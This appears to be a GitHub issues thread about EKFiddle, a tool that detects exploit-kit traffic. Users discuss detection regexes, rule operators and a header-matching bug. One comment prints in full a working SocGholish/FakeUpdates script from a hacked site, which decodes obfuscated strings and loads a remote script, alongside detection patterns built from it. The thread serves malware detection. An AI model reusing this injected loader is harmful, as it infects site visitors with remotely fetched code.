malwareinfosec / ekfiddle Goto Github PK

In case someone is interested in converting EKFiddle rules to Yara rules, I wrote this tool EKFiddle2Yara that does just that.

I would suggest modifying following regex, or adding a new one:

SourceCode FakeUpdates (hacked site) \("cmVmZXJyZXI="\)\]\|\|'';

to

SourceCode FakeUpdates (hacked site) \("VjJsdVpHOTNjdz09"\)\)==

The FakeUpdates campaign, A.K.A. SocGholish recently updated their payload "obfuscation". They all have now double-base64 encoded word Windows in it. Other interesting keywords to use are T2k4dktGdGVMMTByS1M4PQ== = ://([^/]+)/ or WDE5ZmRYUnRZUT09 = ___utma

Full example payload below:

<script type="text/javascript">jQuery(document).ready(function($) {$("#mobile-navigation").slicknav({prependTo:"#mobile-nav-holder",easingOpen: "swing",easingClose: "swing",url: "https://cloudian.com/",closedSymbol: "►",openedSymbol: "▼",brand: '<a href="https://cloudian.com/" class="mobile-branding-image"><img src="https://2sq7d632aduy7flhh6iaxnby-wpengine.netdna-ssl.com/wp-content/uploads/2017/01/cloudian-logo-438.png" ></a>', search: "<i class=\"fa fa-search\"></i>",parentTag: "a",parentTag: "a",closeOnClick: false,allowParentLinks: true,});});</script>        <script>;(function(){var eo=document.referrer;var ro=window.location.href;var rc=navigator.userAgent;var wm=new RegExp(en('T2k4dktGdGVMMTByS1M4PQ=='));if(!eo||ro.match(wm)[1]==eo.match(wm)[1]||rc.indexOf(en("VjJsdVpHOTNjdz09"))==-1||window.localStorage[en("WDE5ZmRYUnRZUT09")]){return;}var hw=document.createElement('script');hw.type='text/javascript';hw.async=true;hw.src=en('YUhSMGNITTZMeTlvZFc1MFpYSXViR2xpWlhKMGVXeGhkMkY2TG1OdmJTOXlaWEJ2Y25RL2NqMWthakF6VFVSbmVWcFVZelZhYlU1b1RqSkZkMWt5VFRKWmFrRXpUa05hYW1GWFVUbE5hbGw2');var vq=document.getElementsByTagName('script')[0];vq.parentNode.insertBefore(hw,vq);function en(bz){return wx(window.atob(bz));}function wx(ty){return window.atob(ty);}})();</script>

^http(s)?:\/\/([a-z]{5,20})\.[a-z]{5,20}\.xyz\/[a-z]{3,10}\-[a-z]{3,10}\-\2$

Do you have any pre-built regexes to share?

I have malicious traffic (Rig EK) in Fiddler, when I click Run Regexes it says no malicious traffic has been found.

Looking at EKFiddle\Regexes\URLRegexes.txt and EKFiddle\Regexes\HeaderRegexes.txt both files are empty expect for the instructions at the top.

Hi, Jérôme,

You have added the operators *AND* and *OR* to the SourceCode rule type. Looking into it, I realized that you're checking for the existence of both operators in the same rule, but that doesn't make sense!

For example,

SourceCode HellowWorld potato *AND* chips *OR* lays

Interpreting the above rule with this logic (from left-to-right) would be as follows: both the strings "potato" AND "chips" have to exist, and then, either "chips" OR "lays" could exist!

It would make sense if I read it this way, you're implying that either the *AND* operator statement holds true or the *OR* operator statement holds true.

Hi

I have found an issue with custom regex's not being detected in the referrer headers. Any regex I create will not detect a referred url. Try it for yourself.

Referer: http://www.comcreditcontor.com/hx310/
Headers UNKC2007 \/hx310\/ UNKC2007_URL
(tabs are in there, formatting issue for github)